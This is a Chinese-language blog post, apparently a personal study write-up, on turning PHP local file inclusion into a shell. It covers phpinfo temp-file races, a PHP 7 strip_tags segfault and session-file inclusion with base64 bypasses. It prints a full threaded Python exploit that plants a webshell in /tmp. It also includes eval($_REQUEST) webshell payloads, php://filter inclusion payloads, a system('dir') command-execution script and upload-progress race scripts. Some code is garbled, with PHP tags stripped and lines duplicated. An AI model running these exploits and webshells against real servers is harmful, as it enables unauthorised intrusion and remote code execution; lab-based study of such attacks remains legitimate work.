• PHP LFI 利用临时文件Getshell


    PHP LFI 利用临时文件 Getshell 姿势-安全客 - 安全资讯平台

    LFI 绕过 Session 包含限制 Getshell-安全客 - 安全资讯平台

    目录

     PHP LFI 利用临时文件Getshell

    临时文件

    linux 和 windows的 临时文件存储规则

    linux和windows对临时文件的命名规则

    PHPINFO()特性

    原理

    条件竞争

    PHP7 Segment Fault

    利用条件

    攻击技巧1

    LFI 绕过 SESSION 包含限制 Getshell

    会话存储

    存储位置

    存储命名

    会话处理

    session.serialize_handler

    LFI SESSION

    serialize_handler = php

    serialize_handler = serialize_php

    session文件包含限制

    SessionBase64Encode

    bypass serialize_handler=php

    base64加解密

    加密

    解密

    base64特点

    bypass base64_encode

    bypass serialize_handler = php_serialize

     NO Session_start()

    技巧1

    技巧2


     

    思路都是跟着师傅们走的 其中加上了自己的想法和环境的改变

     PHP LFI 利用临时文件Getshell

    首先我们了解一下什么是

    临时文件

    在通过web 传递文件的时候 通过 POST PUT 进行文本和二进制的传递

    我们上传的文件信息会保存在全局变量 $_FIELS中

    1. $_FILE 这个全局变量很特殊 他是预定义超级数组中唯一一个二维数组
    2. 作用是上传文件的各种信息
    3. $_FIELS['userfile']['name'] 客户端文件的名字
    4. $_FIILS['userfile']['type'] 文件MIME,如果浏览器提供这种支持 例如 "image/gif"
    5. $_FILES['userfile']['size'] 文件的大小 字节
    6. $_FILES['userfile']['tmp_name'] php上传存储服务端的临时文件 一般是系统默认,可以在php.ini 的 upload_tmp_dir 中指定 默认是 /tmp目录
    7. $_FILES['userfile']['error'] 文件上传错误的代码 上传成功则为 0 否则就是错误信息

    在临时包含文件漏洞中
    $_FIELS['userfile']['name'] 这个变量很重要 我们需要知道这个临时文件的名字 我们才可以通过 include包含 那我们如何知道 我们首先要了解

    linux 和 windows的 临时文件存储规则

    1. linux
    2. /tmp
    3. windows
    4. C:/Windows/
    5. 或者
    6. C:/Windows/Temp

    如果php.ini的 upload_tmp_dir没有写入

    就会默认生成在这里

    我们还需要了解

    linux和windows对临时文件的命名规则

    1. linux
    2. 保存在 tmp下的格式通常为
    3. tmp/php[6个字符]
    4. windows
    5. 保存在 C:/Windows下的格式通常为
    6. C:/Windows/php[四个字符].tmp

    PHPINFO()特性

    如果文件中存在phpinfo 我们知道可以获取临时文件名

    \vulhub-master\php\inclusion

    我们可以用自己的方式来

    index.php

    1. $file = $_GET['file'];
    2. include($file);
    3. ?>

    info.php

     phpinfo();?>
    

     然后通过exp来实现

    原理是什么呢

    原理

    向php发送代码区块的时候 无论有没有被解析 都会存入一个临时文件 其实就是文件上传

    我们通过上传一个文件内容 就可以生成一个临时文件

    我们可以通过request来实现

    1. files = {
    2. 'file': ("aa.txt","ssss")
    3. }
    4. r = requests.post(url=url, files=files, allow_redirects=False)

    这里其实就是上传了一个文件区块

    所以会生成一个临时文件在tmp(默认)目录下

    这个时候 phpinfo()登场了 phpinfo()会输出当前请求上下中的所有变量 所以我们向phpinfo的页面

    传输上面的文件区块 phpinfo就会输出 我们就可以在phpinfo中找到 $_FILES的内容 这个时候 我们就可以获取了临时文件

    但是我们如何发送个文件包含 还要保证 临时文件不被删除呢

    这里就是打一个时间差

    条件竞争

    1. 首先 我们发送一个包含webshell的包 这个包的header get post 全是垃圾数据
    2. 然后phpinfo 将所有内容打印出来 php默认输出缓冲区的大小为4096
    3. 可以理解为 每次输出4096都给 socket链接 就是都输出响应
    4. 所以 我们读取原生的socket 只要发现了 临时文件名 就再发一次垃圾包
    5. 这个时候 第一次的 socket还没有结束 但是还是接受到了 第二次的 socket
    6. 从而就接上了 临时文件 这个时候 我们将临时文件 输出给文件包含页面
    7. 这个时候就可以包含我们的webshell了

     我们先不用exp

    我们来使用 request来看看能不能输出 $_FILES变量

    上面是python输出的 发现成功获取了 临时文件

    然后我们开始从docker中 来学尝试

    首先去 vulhub拉去镜像

    访问 localhost:8080/phpinfo.php

    /lfi.php?file=phpinfo.php

    上面文件确定了存在文件包含

    这里

    1. phpinfo
    2. 文件包含

     两个条件都确定了 所以我们可以通过exp直接上传木马了

    下面是exp  是我通过gpt修改的py3环境 因为我的py2 无法实现

    https://github.com/vulhub/vulhub/blob/master/php/inclusion/exp.py%22%3Ehttps://github.com/vulhub/vulhub/blob/master/php/inclusion/exp.py%3C/a%3E

    py3 exp.py ip 8080 100
    1. #!/usr/bin/python3
    2. import sys
    3. import threading
    4. import socket
    5. def setup(host, port):
    6. TAG = "安全测试"
    7. PAYLOAD = """%s\r
    8. ')?>\r""" % TAG
    9. REQ1_DATA = """-----------------------------7dbff1ded0714\r
    10. Content-Disposition: form-data; name="dummyname"; filename="test.txt"\r
    11. Content-Type: text/plain\r
    12. \r
    13. %s
    14. -----------------------------7dbff1ded0714--\r""" % PAYLOAD
    15. padding = "A" * 5000
    16. REQ1 = """POST /phpinfo.php?a=""" + padding + """ HTTP/1.1\r
    17. Cookie: PHPSESSID=q249llvfromc1or39t6tvnun42; othercookie=""" + padding + """\r
    18. HTTP_ACCEPT: """ + padding + """\r
    19. HTTP_USER_AGENT: """ + padding + """\r
    20. HTTP_ACCEPT_LANGUAGE: """ + padding + """\r
    21. HTTP_PRAGMA: """ + padding + """\r
    22. Content-Type: multipart/form-data; boundary=---------------------------7dbff1ded0714\r
    23. Content-Length: %s\r
    24. Host: %s\r
    25. \r
    26. %s""" % (len(REQ1_DATA), host, REQ1_DATA)
    27. # modify this to suit the LFI script
    28. LFIREQ = """GET /lfi.php?file=%s HTTP/1.1\r
    29. User-Agent: Mozilla/4.0\r
    30. Proxy-Connection: Keep-Alive\r
    31. Host: %s\r
    32. \r
    33. \r
    34. """
    35. return (REQ1, TAG, LFIREQ)
    36. def phpInfoLFI(host, port, phpinforeq, offset, lfireq, tag):
    37. s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    38. s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    39. s.connect((host, port))
    40. s2.connect((host, port))
    41. s.send(phpinforeq.encode())
    42. d = b""
    43. while len(d) < offset:
    44. d += s.recv(offset)
    45. try:
    46. i = d.index(b"[tmp_name] => ")
    47. fn = d[i + 17:i + 31]
    48. except ValueError:
    49. return None
    50. s2.send((lfireq % (fn.decode(), host)).encode())
    51. d = s2.recv(4096)
    52. s.close()
    53. s2.close()
    54. if d.find(tag.encode()) != -1:
    55. return fn.decode()
    56. counter = 0
    57. class ThreadWorker(threading.Thread):
    58. def __init__(self, e, l, m, *args):
    59. threading.Thread.__init__(self)
    60. self.event = e
    61. self.lock = l
    62. self.maxattempts = m
    63. self.args = args
    64. def run(self):
    65. global counter
    66. while not self.event.is_set():
    67. with self.lock:
    68. if counter >= self.maxattempts:
    69. return
    70. counter += 1
    71. try:
    72. x = phpInfoLFI(*self.args)
    73. if self.event.is_set():
    74. break
    75. if x:
    76. print("\n成功!Shell已创建在 /tmp/shell")
    77. self.event.set()
    78. except socket.error:
    79. return
    80. def getOffset(host, port, phpinforeq):
    81. """获取php输出中tmp_name的偏移量"""
    82. s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    83. s.connect((host, port))
    84. s.send(phpinforeq.encode())
    85. d = b""
    86. while True:
    87. i = s.recv(4096)
    88. d += i
    89. if i == b"":
    90. break
    91. # detect the final chunk
    92. if i.endswith(b"0\r\n\r\n"):
    93. break
    94. s.close()
    95. i = d.find(b"[tmp_name] => ")
    96. if i == -1:
    97. raise ValueError("在phpinfo输出中未找到php tmp_name")
    98. print("在位置 %i 找到 %s" % (i, d[i:i + 10].decode()))
    99. # 加一些填充
    100. return i + 256
    101. def main():
    102. print("LFI With PHPInfo()")
    103. print("-=" * 30)
    104. if len(sys.argv) < 2:
    105. print("用法:%s 主机 [端口] [线程数]" % sys.argv[0])
    106. sys.exit(1)
    107. try:
    108. host = socket.gethostbyname(sys.argv[1])
    109. except socket.error as e:
    110. print("主机名 %s 无效,请确保输入正确的主机名或IP地址。" % sys.argv[1])
    111. host = socket.gethostbyname(sys.argv[1])
    112. except socket.error as e:
    113. print("主机名 %s 无效,请确保输入正确的主机名或IP地址。" % sys.argv[1])
    114. sys.exit(1)
    115. port = int(sys.argv[2]) if len(sys.argv) > 2 else 80
    116. numthreads = int(sys.argv[3]) if len(sys.argv) > 3 else 10
    117. phpinforeq, tag, lfireq = setup(host, port)
    118. offset = getOffset(host, port, phpinforeq)
    119. print("\n[*] 开始进行LFI攻击...")
    120. threads = []
    121. e = threading.Event()
    122. l = threading.Lock()
    123. try:
    124. for i in range(numthreads):
    125. t = ThreadWorker(e, l, 100, host, port, phpinforeq, offset, lfireq, tag)
    126. threads.append(t)
    127. t.start()
    128. while not e.is_set():
    129. try:
    130. e.wait(1)
    131. except KeyboardInterrupt:
    132. print("\n[*] 收到中断信号,正在停止攻击...")
    133. e.set()
    134. except socket.error as e:
    135. print("连接错误:%s" % str(e))
    136. for t in threads:
    137. t.join()
    138. print("\n[*] 攻击结束。")
    139. if __name__ == "__main__":
    140. main()

    这四个地方 按照自己的设定来实现

    成功了 这个时候 临时文件就不会被删除

     这里大家不要绕晕了 因为我们其实保存的临时文件 还是PHP[四个字符]这种格式

    但是我们的木马写的是

     file_put_contents('/tmp/shell', '')?>

     重新写一个文件 到tmp的shell下

    所以我们这里可以去tmp/shell包含

    因为上面的exp会一直发送垃圾包给phpinfo 并且 同时发送文件包含到lfi.php中 包含临时文件

    然后临时文件内容为写入shell 从而达到getshell

    PHP7 Segment Fault

    这里看名字就知道了

    利用条件

    PHP版本  7.0.0-----7.0.28

    上面的条件其实挺苛刻的 需要 存在文件包含 并且还有phpinfo的界面

    那么这里研究的就是 如果没有存在 phpinfo 的界面 我们是不是就无法通过 文件包含getshell

    其实不然

    PHP 7 存在一个漏洞 CVE-2018-14884 segment fault漏洞

    1. 首先 我们知道 php存在过滤器 我们常用的filter中存在有一个
    2. php://filter/string.strip_tags 原本的作用是在字符串中去除 HTML 和 PHP 标签
    3. 但是在 7.0.0----7.0.28
    4. 中 使用 string.strip_tags 会让文件崩溃 出现 segment fault(段错误)
    5. 这个时候 php的垃圾回收 就失效了 不会像phpinfo 一样删除临时文件 所以临时文件
    6. 就会保留在 tmp 或者 upload_tmp_dir 设定的目录下

    我们一样继续在本地搭建环境测试

    dir.php

    1. $a= @$_GET['dir'];
    2. if(!$a){
    3. $a = 'C:\Windows';
    4. }
    5. var_dump(scandir($a));
    6. ?>

    index.php

    1. $a = @$_GET['dir'];
    2. var_dump(scandir($a));
    3. ?

    然后我们的目的是文件包含的时候破坏php 出现段错误

    我们首先来测试

    首先配置 7 的版本

    windows.php.net - /downloads/releases/archives/

     然后访问 index.php

    这里是windows的环境 所以我们访问C:/Windows/win.ini/

    其实这里什么文件都是可以的

    127.0.0.1:3000/index.php?file=php://filter/string.strip_tags/resource=C:/Windows/win.ini

    出现了报错

    这里就说明存在了

    那么我们如何通过上传php木马呢

    我们来request写入

    攻击技巧1

    这里是通过存在 dir.php 来显示

    这里顺便介绍一个库io 其中的 方法

    BytesIO 主要是通过 字节方式存储 我们传递文件 就可以使用这个

    1. import requests
    2. from io import BytesIO
    3. url1 = "http://localhost/index.php?file=php://filter/string.strip_tags/resource=C:/Windows/win.ini"
    4. files = {'file':BytesIO('')}
    5. re = requests.post(url=url1,files=files,allow_redirects=False)
    6. url2 = "http://localhost/dir.php"
    7. re2 = requests.get(url = url2)
    8. print re2.text

    首先 我们可以找到 php临时文件

    然后我们就可以通过这个执行命令了

    1. # -*- coding: utf-8 -*-
    2. import re
    3. import requests
    4. from io import BytesIO
    5. # 定义漏洞URL和文件路径
    6. vul_url = "http://localhost/index.php?file=php://filter/string.strip_tags/resource=C:/Windows/win.ini"
    7. url2 = "http://localhost/dir.php"
    8. # 构建文件
    9. files = {'file': BytesIO('')}
    10. # 发送漏洞利用请求
    11. req = requests.post(url=vul_url, files=files, allow_redirects=False)
    12. req2 = requests.get(url=url2)
    13. # 获取临时文件名
    14. content1 = re.search(r"php[a-zA-Z0-9]{1,}.tmp", req2.content).group(0)
    15. # 构建获取目录列表的URL
    16. url3 = "http://localhost/index.php?file=C:/Windows/{}".format(content1)
    17. # 构建命令
    18. data = {
    19. 1: "system('dir');"
    20. }
    21. # 发送获取目录列表的请求
    22. req3 = requests.post(url=url3, data=data)
    23. # 输出结果
    24. print u"目录列表:\n{}".format(req3.text)

    这个代码确实写的恶心了点 。。。。。

    但是执行了命令

    这里条件其实还是有点苛刻 需要dir.php来输出 如果我们不存在呢

    其实我们只需要一个文件包含即可 因为我们可以通过爆破/遍历 来实现

    我们可以使用工具来直接进行fuzz 我们使用 bp来进行

    我本地是 4A41 我们直接bp跑了

    看看要多久

    ok 爆破了半天 白爆破了 看了会手机才发现没有加目录。。。。。

    差不多爆破了 8分钟吧 还是慢的

    成功获取了shell

    LFI 绕过 SESSION 包含限制 Getshell

    搞完上面 居然还有一个。。。。。 好累啊

    但是确实学到东西 ^_^

    一样 我们了解如何绕过 先去看看 如何session是什么

    session 叫做 用户会话 用来存储标识的

    我们首先看看

    会话存储

    存储位置

    每个语言存储的方式是不一样的

    1. java 是 将session 存储入内存中
    2. php 是 将 session 以一个文件形式存储
    3. 存储的位置我们可以去php.ini查看

    第二种 我们可以通过phpinfo查看

    因为没有设置 所以默认是tmp

    但是其实实际中 存在一下存储位置

    1. /var/lib/php/sess_PHPSESSID
    2. /var/lib/php/sessions/sess_PHPSESSID
    3. /tmp/sess_PHPSESSID
    4. /tmp/sessions/sess_PHPSESSID

    存储命名

    我们如果要实现文件包含 我们就需要了解文件名是什么

    1. 一般我们能看到
    2. 我们bp发包的时候是
    3. Cookie: PHPSESSID=abdsajdjad

    这个时候 就会生成sess_abdsajdjad

    其实就是 sess_[我们发送的session]

    我这里是通过windows环境进行测试 所以我的session存放位置是

    C:\Users\Administrator\AppData\Local\Temp

    1. session_start();
    2. $username = $_POST['username'];
    3. $_SESSION["username"] = $username;
    4. ?>

     我们发送 username=1

    可以获取到session

    然后去目录下找

    会话处理

    我们了解了session的存储 我们现在需要了解一下 会话的处理

    其实主要处理方式 是php.ini 或者 代码中对session.serialize_handler的配置

    session.serialize_handler

    我们这里先需要了解一下这个配置

    session.serialize_handler = php 这个是默认配置 存储方式 是通过|来间隔

    1. session_start();
    2. $username = $_POST['username'];
    3. $_SESSION["username"] = $username;
    4. ?>

     session.serialize_handler = php_serialize 这个是php5.5后启用的 通过序列化进行分割

    1. ini_set('session.serialize_handler', 'php_serialize');
    2. session_start();
    3. $username = $_POST['username'];
    4. $_SESSION["username"] = $username;
    5. ?>

    能发现是通过序列化进行存储的

    上面了解完了 session的知识

    现在我们需要了解文件包含

    LFI SESSION

    serialize_handler = php

    这里开始了解 session 文件包含漏洞

    首先我们需要一个文件包含的漏洞代码 index.php

    1. $file = $_GET['file'];
    2. include($file);
    3. ?>

    然后需要一个上传session的内容 session.php

    1. session_start();
    2. $username=$_POST['username'];
    3. $_SESSION["username"] = $username;
    4. ?>

    然后我们通过session传递参数

    获取session值 这个时候我们就相当于知道了 session文件的文件名

    sess_4794cc8f9f63ed29d97daf155ee94ef2

    其次我们通过文件包含读取这个文件看看

    我这里是

    C:\Users\Administrator\AppData\Local\Temp\sess_4794cc8f9f63ed29d97daf155ee94ef2

    成功读取了

    但是我们换一种思路 我们通过写入木马呢

    username= eval($_REQUEST[1]);?>

    然后去查看sess文件

    可以发现命令执行成功

    serialize_handler = serialize_php

    一样我们通过payload执行传递一句话

    username= eval($_REQUEST[1]);?>

    然后去包含文件看看  这里和上面我的路径不一样 是因为上面是vs的 下面是小皮开的

    发现成功执行了 getshell 了 蚁剑链接看看

    以上是最最最最理想化的session文件包含了

    现在我们来探讨一下文件包含的限制

    session文件包含限制

    一般会对session进行加密传递 或者 服务器中根本不出现 session_start这种设置

    这样我们就无法生成session 自然无法实现本地文件包含

    下面开始进行

    SessionBase64Encode

    首先是对session进行base64加密

    session.php

    1. session_start();
    2. $username=$_POST['username'];
    3. $_SESSION["username"] = base64_encode($username);
    4. echo "username -> $usernmae"
    5. ?>

    index.php

    1. $file = $_GET['file'];
    2. include($file);
    3. ?>

    然后我们开始进行正常的操作

    usernmae= eval($_REQUEST[1]);?>

    然后去访问sess文件

     发现了 base加密 我们看看能不能直接通过 过滤器解密

    发现乱码了

    因为base过滤器解密是将所有的信息解密 包括前面的base64

    所以会变成乱码

    现在我们学习绕过

    绕过分为两种

    bypass serialize_handler=php

    这里我们希望 我们解密的地方能够和加密的地方对上

    base64加解密
    加密

    base64编码是将64个可打印字符按照任意字节序编码成ASCII字符 另外 = 可以作为后缀

    然后我们探讨一下base64编码的过程

    1. Base64 首先将输入 按照字节切分
    2. 然后获取每个位的二进制 (不足8bit 高位补0)
    3. 然后将二进制串联 再按照6bit的长度组合(不足6位末尾补0
    4. 将每组二进制转换为十进制 然后通过ASCII对照表进行转换为ASCII值

    LFI 绕过 Session 包含限制 Getshell-安全客 - 安全资讯平台

    引用师傅里面的图像

    1. 我们通过 ABCD来测试
    2. A B C D
    3. 0x41 0x42 0x43 0x44 十六机制
    4. 01000001 01000010 01000011 01000100 二进制
    5. 010000 010100 001001 000011 010001 000000 通过6个组合为一组二进制
    6. 16 20 9 3 17 0 转为十进制
    7. Q U J D R A 通过base64对照表进行十进制转换

    上面就是流程了

    加密后最后通过 ==补齐

    QUJDRA==
    解密

    其实就是上面的逆向

    1. 首先通过base64对照表进行转为十进制
    2. 十进制转为二进制
    3. 二进制拆开 通过 8bit组合
    4. 然后转变为十六进制
    5. 最后变为ASCII值
    base64特点

    我们首先知道 base64是将ascii 变为可见字符的加密

    PHP在解密base64的时候 如果遇到了不可见字符即不在64个字符中的字符 就会跳过

    仅将合法的字符组成字符串进行解密

    64个字符为(A-Z、a-z、0-9、+、/)

    我们可以通过测试来看看

    1. $base1 = "ABCDEFGbacd";
    2. $base2 = "ABCD#EFGbacd";
    3. $base3 = "ABCD&EFGbacd";
    4. echo "第一个:".base64_decode($base1);
    5. echo "
      "
      ;
    6. echo "第二个:".base64_decode($base2);
    7. echo "
      "
      ;
    8. echo "第三个:".base64_decode($base3);
    9. ?>

     这里我们可以发现 三次输出都是一样的 不一样的是我输入后两个加了个在64字符之外的内容

    所以这里我们能确定 会跳过不合法的字符 将合法字符组合为一个字符串 然后进行解密

    bypass base64_encode

    这里其实我也看了好久我才明白什么意思

    其实我们这里全部解密失败的原因是下面的

    1. 我们传入的内容
    2. username|s:36:"PD9waHAgZXZhbCgkX1JFUVVFU1RbMV0pOz8+";
    3. 我们只需要特殊关注下面的内容
    4. username|s:36:" 我们回忆一下64个字符中 并不存在 : "
    5. 所以其实解密只会解密到
    6. usernames36
    7. 按照base64 四个为一组进行解密
    8. user name s36X 后面的X是占位符
    9. 这里我们发现 最后是 s36 然后就没有了 那么是不是需要后面我们的shell来补齐
    10. PD9waHAgZXZhbCgkX1JFUVVFU1RbMV0pOz8+
    11. 就会补齐一个上去
    12. 所以变为了
    13. s36P D9wa 我们的木马就被破坏了
    14. 所以我们需要找到一个方法 让s36这块变成4
    15. 其实很简单
    16. s:36 后面的36 是按照我们传入的木马字符数 进行获取
    17. 如果我们传递一个100个字符的字符串
    18. 那么是不是就会变为 s100 (假设为100
    19. 那么现在base64解密
    20. 是不是就变为了
    21. user name s100 PD9wa HAgZ ....... 正常解密了 后面的加密字符串

    那我们可以开始构造payload了

    然后我们传递一下

    username=nmnmnmnmnmnmnmnmnmnmnmnmnmnmnmnmnmnmnmnmnmnmnmnmnmnmnm eval($_REQUEST[1]);?>

    然后我们去文件包含一下看看多少个字符

    这里就实现咯

    user name s108 bm1u .....

    然后我们通过过滤器读取吧

    php://filter/convert.base64-decode/resource=C:\Users\Administrator\AppData\Local\Temp\sess_4794cc8f9f63ed29d97daf155ee94ef2

    直接就可以getshell了

    这里原本通过vscode起来的本地环境无法使用蚁剑链接 也不知道为什么

    然后通过小皮就可以了

    这里我们就实现了 bypass serialize_handler = php 的base64加密存储session

    接下来就是另一个了

    bypass serialize_handler = php_serialize

    说完上面的 现在说说序列化怎么办

    session.php

    1. ini_set('session.serialize_handler', 'php_serialize');
    2. session_start();
    3. $username = $_POST['username'];
    4. $_SESSION['username'] = base64_encode($username);
    5. echo "username -> $username";
    6. ?>

    我们一样 先传递木马上去看看

    usernmae= eval($_REQUEST[1]);?>

    然后我们去包含查看

    C:\Windows\sess_4794cc8f9f63ed29d97daf155ee94ef2
    1. a:1:{s:8:"username";s:36:"PD9waHAgZXZhbCgkX1JFUVVFU1RbMV0pOz8+";}
    2. 得到内容了
    3. 我们看看如果我们全部basae64解码 是这么个情况 (在序列化的情况下)
    4. a1s8 user name s36P D9wa .........
    5. 很显然 还是出现了 缺少一位 那我们上面的payload可以直接使用

    payload

    username=nmnmnmnmnmnmnmnmnmnmnmnmnmnmnmnmnmnmnmnmnmnmnmnmnmnmnm eval($_REQUEST[1]);?>
    php://filter/convert.base64-decode/resource=C:\Windows\sess_4794cc8f9f63ed29d97daf155ee94ef2

    。。。。。。小皮把我ban了 那我还是换成vscode的环境吧

    换路径

    C:\Users\Administrator\AppData\Local\Temp\sess_4794cc8f9f63ed29d97daf155ee94ef2

    所以包含payload就变为

    php://filter/convert.base64-decode/resource=C:\Users\Administrator\AppData\Local\Temp\sess_4794cc8f9f63ed29d97daf155ee94ef2

     NO Session_start()

    上面的情况 全都是在 我们确定可以获取 用户session的情况下进行

    那么有没有可能 服务器不开启session 那我们是不是就无法进行上传

    其实还是可以的

    我们首先进入phpinfo看看

    1. session.auto_start: 接受到session自动初始化 不需要session_start()
    2. 一般都是关闭的
    3. session.upload_progress.enabled: 默认开启 php接受文件上传时检测速度
    4. session.upload_progress.cleanup: 默认开启 表示文件上传后 默认对session文件进行清除
    5. 这里是后面条件竞争的点
    6. session.upload_progress.name = "PHP_SESSION_UPLOAD_PROGRESS"
    7. 这里是关键的地方
    8. 首先需要在文件上传的过程中
    9. 其次接收到POST内容 并且内容和 phpinfo中的session.upload_progress.name同名的变量时
    10. 上传的进度可以在session中获得(这里系统会自动初始化session)

     看懂上面的内容其实就多半了解了

    就是文件上传的时候 传递一个同名的参数 就会开启session

    我们来进行思路的整理

    首先是文件上传

    {'file':('abc.txt',"abcd")}

    并且设置cookie (session.use_strict_mode=0)这里可以实现可控

    PHPSESSID=nm1111sl

    然后POST一个 session.upload_progress.name (可控)

    session.upload_progress.name: phpinfo();?>

    然后因为上面存在cleanup

    会清除这个文件 所以我们需要条件竞争 可以维持sess_nm1111sl的存在

    这里我们就可以编写个exp来实现了

    技巧1

    1. import io
    2. import sys
    3. import requests
    4. import threading
    5. sessid = 'Qftm'
    6. def POST(session):
    7. while True:
    8. f = io.BytesIO(b'a' * 1024 * 50)
    9. session.post(
    10. 'http://192.33.6.145/index.php',
    11. data={"PHP_SESSION_UPLOAD_PROGRESS":"');?>"},
    12. files={"file":('q.txt', f)},
    13. cookies={'PHPSESSID':sessid}
    14. )
    15. def READ(session):
    16. while True:
    17. response = session.get(f'http://192.33.6.145/index.php?file=../../../../../../../../var/lib/php/sessions/sess_{sessid}')
    18. # print('[+++]retry')
    19. # print(response.text)
    20. if 'flag' not in response.text:
    21. print('[+++]retry')
    22. else:
    23. print(response.text)
    24. sys.exit(0)
    25. with requests.session() as session:
    26. t1 = threading.Thread(target=POST, args=(session, ))
    27. t1.daemon = True
    28. t1.start()
    29. READ(session)

     由于本地环境部署可能有问题 没有实现成功 但是确实出现了 sess_shell文件

    技巧2

    我们写一个前端代码 用来文件上传

    1. <!doctype html>
    2. <html>
    3. <body>
    4. <form action="http://localhost/index.php" method="post" enctype="multipart/form-data">
    5. <input type="hidden" name="PHP_SESSION_UPLOAD_PROGRESS" vaule="" />
    6. <input type="file" name="file1" />
    7. <input type="file" name="file2" />
    8. <input type="submit" />
    9. </form>
    10. </body>
    11. </html>

    然后放到攻击模块 一直发包

    然后去包含漏洞页面 也是无限发包 就可以实现访问了

    但是本地环境 我设置可能没有设置好 无法实现

    到这里就差不多理解了

  • 相关阅读:
    C++中float和double的比较
    Mybatis中limit用法补充
    静态HTML旅行主题网页设计与实现——联途旅游网服务平台网(39页)HTML+CSS+JavaScript
    关于二进制
    升级requests的方法
    【电源专题】负载瞬变测试--为什么要进行电源的瞬态响应测试
    Javaweb之Vue生命周期的详细解析
    安装JoySSL的SSL证书有什么优势?
    最近的一些杂感-20220921
    avalanche 少量tcp长连接持续构建HTTP请求测试
  • 原文地址:https://blog.csdn.net/m0_64180167/article/details/133757009